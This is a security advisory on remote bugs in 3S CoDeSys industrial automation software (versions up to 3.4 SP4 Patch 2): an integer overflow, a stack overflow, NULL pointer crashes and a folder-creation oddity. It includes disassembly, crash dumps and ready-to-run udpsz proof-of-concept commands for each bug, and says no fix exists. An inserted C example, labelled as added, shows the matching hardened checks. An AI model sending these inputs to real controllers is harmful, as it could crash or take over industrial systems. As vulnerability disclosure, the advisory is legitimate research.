#######################################################################

                             Luigi Auriemma

Application:  3S CoDeSys
              http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions:     <= 3.4 SP4 Patch 2
Platforms:    Windows
Bugs:         A] GatewayService integer overflow
              B] CmpWebServer stack overflow
              C] CmpWebServer Content-Length NULL pointer
              D] CmpWebServer invalid HTTP request NULL pointer
              E] CmpWebServer folders creation
Exploitation: remote
Date:         29 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."

#######################################################################

=======
2) Bugs
=======

----------------------------------
A] GatewayService integer overflow
----------------------------------

GatewayService uses a 32-bit value at offset 0x0c of the header which
specifies the size of the data to receive. The program takes this
number, adds 0x34 and allocates that amount of memory; the addition is
performed on 32 bits, so a large value wraps around and results in an
integer overflow:

  0042CB30  /$ 55              PUSH EBP
  0042CB31  |. 8BEC            MOV EBP,ESP
  0042CB33  |. 8B45 08         MOV EAX,DWORD PTR SS:[EBP+8]
  0042CB36  |. 83C0 34         ADD EAX,34
  0042CB39  |. 5D              POP EBP
  0042CB3A  \. C3              RETN
  ...
  00447AF7  |. 8B45 0C         MOV EAX,DWORD PTR SS:[EBP+C]
  00447AFA  |. 50              PUSH EAX
  00447AFB  |. E8 3050FEFF     CALL GatewayS.0042CB30            ; + 0x34
  00447B00  |. 83C4 04         ADD ESP,4
  00447B03  |. 8945 0C         MOV DWORD PTR SS:[EBP+C],EAX
  00447B06  |> 6A 01           PUSH 1
  00447B08  |. 8B4D 0C         MOV ECX,DWORD PTR SS:[EBP+C]
  00447B0B  |. 51              PUSH ECX
  00447B0C  |. E8 A7050200     CALL GatewayS.004680B8            ; allocation

------------------------------
B] CmpWebServer stack overflow
------------------------------

CmpWebServer is the component used in services like 3SRTESrv3 and
CoDeSysControlService for handling the HTTP connections on port 8080.

The library is affected by a buffer overflow in the function 0040f480,
which copies the input URI into a fixed-size stack buffer without
checking its length, allowing code execution:

  0040F5C5  |> 8B55 F4         MOV EDX,DWORD PTR SS:[EBP-C]
  0040F5C8  |. 2B55 08         SUB EDX,DWORD PTR SS:[EBP+8]
  0040F5CB  |. 52              PUSH EDX
  0040F5CC  |. 8B45 08         MOV EAX,DWORD PTR SS:[EBP+8]
  0040F5CF  |. 50              PUSH EAX
  0040F5D0  |. 8B4D 10         MOV ECX,DWORD PTR SS:[EBP+10]
  0040F5D3  |. 51              PUSH ECX
  0040F5D4  |. E8 97420000     CALL CoDeSysC.00413870            ; memcpy

-------------------------------------------
C] CmpWebServer Content-Length NULL pointer
-------------------------------------------

NULL pointer dereference caused by the lack of checks on the memory
allocation, which trusts the Content-Length value of an HTTP POST
request:

  eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000
  eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0         nv up ei pl nz ac po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
  CmpWebServer!ComponentEntry+0xb37a:
  0128cc9a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

-------------------------------------------------
D] CmpWebServer invalid HTTP request NULL pointer
-------------------------------------------------

NULL pointer dereference caused by an unexpected HTTP request method
other than GET, POST or HEAD:

  eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005
  eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
  CmpWebServer!ComponentEntry+0xc44c:
  0128dd6c 3a51fc          cmp     dl,byte ptr [ecx-4]        ds:0023:00000000=??
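Bugs A to D are all missing input checks on values a remote peer controls: the size at header offset 0x0c (A), the URI length (B), the Content-Length (C) and the request method (D). The following is an added example, not CoDeSys or advisory code, that shows each check in the hardened form a maintainer would write. HDR_OVERHEAD is the +0x34 from the listing above; URI_BUF_SIZE and MAX_BODY_LEN are assumed values, and the request format is reduced to the request line plus an optional Content-Length header.

```c
/* Added example, not CoDeSys code: the input checks whose absence produces
 * bugs A-D above, as a small self-contained request handler. HDR_OVERHEAD is
 * the +0x34 from the advisory; URI_BUF_SIZE and MAX_BODY_LEN are assumed. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define HDR_OVERHEAD 0x34u        /* bytes added to the peer-supplied size (A) */
#define URI_BUF_SIZE 256          /* fixed stack buffer for the URI (B), assumed */
#define MAX_BODY_LEN (1u << 20)   /* Content-Length cap (C), assumed */

enum req_status {
    REQ_OK = 0,
    REQ_MALFORMED,     /* request line is not "METHOD SP URI SP ..." */
    REQ_BAD_METHOD,    /* D: anything other than GET, POST or HEAD */
    REQ_URI_TOO_LONG,  /* B: URI would not fit the fixed buffer */
    REQ_BAD_LENGTH     /* C: Content-Length unparseable or above the cap */
};

/* Bug A as arithmetic: the 32-bit sum wraps, so a huge size turns into a
 * tiny allocation that the later copy overruns. */
uint32_t unchecked_total(uint32_t size)
{
    return size + HDR_OVERHEAD;
}

/* Hardened form: reject any size whose sum would wrap. Returns 1 and stores
 * the total on success, 0 if the request must be dropped. */
int checked_total(uint32_t size, uint32_t *total)
{
    if (size > UINT32_MAX - HDR_OVERHEAD) return 0;
    *total = size + HDR_OVERHEAD;
    return 1;
}

/* Parse "METHOD URI HTTP/x.y\r\n...\r\n\r\n". On REQ_OK the URI is copied into
 * uri (NUL-terminated) and *body_len is the accepted Content-Length (0 if absent). */
enum req_status parse_request(const char *req, char *uri, size_t uri_size,
                              uint32_t *body_len)
{
    static const char *const allowed[] = { "GET", "POST", "HEAD" };
    const char *sp1 = strchr(req, ' ');
    if (!sp1) return REQ_MALFORMED;

    /* D: dispatch only on known methods instead of calling through a NULL
     * handler for an unexpected one. */
    size_t mlen = (size_t)(sp1 - req);
    int known = 0;
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strlen(allowed[i]) == mlen && memcmp(req, allowed[i], mlen) == 0)
            known = 1;
    if (!known) return REQ_BAD_METHOD;

    /* B: measure the URI against the destination before copying. */
    const char *uri_start = sp1 + 1;
    const char *sp2 = strchr(uri_start, ' ');
    if (!sp2) return REQ_MALFORMED;
    size_t ulen = (size_t)(sp2 - uri_start);
    if (ulen >= uri_size) return REQ_URI_TOO_LONG;
    memcpy(uri, uri_start, ulen);
    uri[ulen] = '\0';

    /* C: bound Content-Length before it drives an allocation and a copy.
     * (Case-sensitive header match is a simplification of this example.) */
    *body_len = 0;
    const char *cl = strstr(req, "\r\nContent-Length:");
    if (cl) {
        const char *digits = cl + strlen("\r\nContent-Length:");
        char *end;
        unsigned long long v = strtoull(digits, &end, 10);
        if (end == digits || v > MAX_BODY_LEN) return REQ_BAD_LENGTH;
        *body_len = (uint32_t)v;
    }
    return REQ_OK;
}

/* Validate into a local buffer and return only the verdict. */
enum req_status check_request(const char *req)
{
    char uri[URI_BUF_SIZE];
    uint32_t body_len;
    return parse_request(req, uri, sizeof uri, &body_len);
}

/* Constructed request whose URI is longer than URI_BUF_SIZE. */
enum req_status check_long_uri(void)
{
    char req[URI_BUF_SIZE + 64];
    size_t n = strlen("GET /");
    memcpy(req, "GET /", n);
    memset(req + n, 'a', URI_BUF_SIZE);
    n += URI_BUF_SIZE;
    strcpy(req + n, " HTTP/1.0\r\n\r\n");
    return check_request(req);
}
```

With the size value the advisory uses for bug A, unchecked_total(0xfffffff2) wraps to 0x26 while checked_total refuses it; check_request returns REQ_BAD_METHOD for a method outside the three the server expects, REQ_BAD_LENGTH for a Content-Length of 4294967295, and REQ_URI_TOO_LONG for a URI longer than the destination buffer, which are the points at which a hardened server would close the connection instead of crashing.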
--------------------------------
E] CmpWebServer folders creation
--------------------------------

Not a security bug (at least at the moment) but weird and funny enough
to note. The webserver calls CreateDirectory at address 0041206d before
doing a secondary CreateFile (read mode).

The only possible attack scenario I can imagine is the case where the
server automatically generates logs or other files and this bug
prevents their creation due to the presence of folders with the same
names, but I don't know the software well enough to confirm this
scenario.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

A]
  udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff

B]
  udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192

C]
  udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

D]
  udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

E]
  udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  ...

#######################################################################

======
4) Fix
======

No fix.

#######################################################################